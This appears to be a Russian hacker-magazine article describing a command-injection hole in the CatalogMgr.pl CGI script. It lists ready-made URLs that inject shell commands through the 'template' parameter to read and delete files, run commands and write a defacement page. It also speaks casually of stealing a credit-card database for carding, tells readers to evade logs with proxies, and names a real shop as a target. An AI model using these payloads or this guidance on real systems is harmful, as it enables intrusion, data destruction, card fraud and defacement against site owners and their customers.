Привет, перцы. Сегодня решил я рассказать
вам о дыре, которая называется CatalogMgr.pl

Exploit:

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;команда|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=файл

Итак, что же дает нам эта уязвимость? Как
ты уже догадался, мы можем смотреть все
файлы и директории на диске. Но, помимо
этого, мы можем выполнять некоторые команды.

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "string" >> file_name|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;who|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;id|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;cp 1file 2file|
http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;rm file_name|

Теперь, когда ты уже нашел базу сс и
накардил себе сотовый, холодильник, машину,
дом, дачу можно приступить к завершающей
части — дефейсу. Можно, конечно, получить
логин с паролем, закачать своим скриптом
файло, но на этом останавливаться не будем.
Что если ftp закрыт? Придется писать html на
месте. Все бы хорошо, но в твоем коде нельзя
использовать знак "="… Поэтому можно
сделать только текстовый дефейс, а это
ламерство. Тут к нам на помощь приходят
стили. Что же можно сделать? Стиль будет
выглядеть примерно так:

<style>BODY{background-image: url(http://www.neod.f2s.com/hacked.gif);background-repeat:
no-repeat;}</style>

Теперь нам остается набрать в браузере
строку:

http://www.blablabla.com/cgi-bin/CatalogMgr.pl?cartID= b-6286&SearchField=category&SearchFor=DVD+Players
&template=;echo "<html><head><title>Hacked by
NeodTeam</title> <style>BODY{background-image: url(http://www.myserver.com/hacked.gif);
background-repeat:no-repeat;}</style></head> <body></body><html>"
> default.htm|

Вот и все !!! (Не забывайте о прокси и логах)

P.S Для примера можете хакнуть www.inetshopping.com

Оставить мнение

Check Also

LUKS container vs Border Patrol Agent. Как уберечь свои данные, пересекая границу

Не секрет, что если ты собрался посетить такие страны как США или Великобританию то, прежд…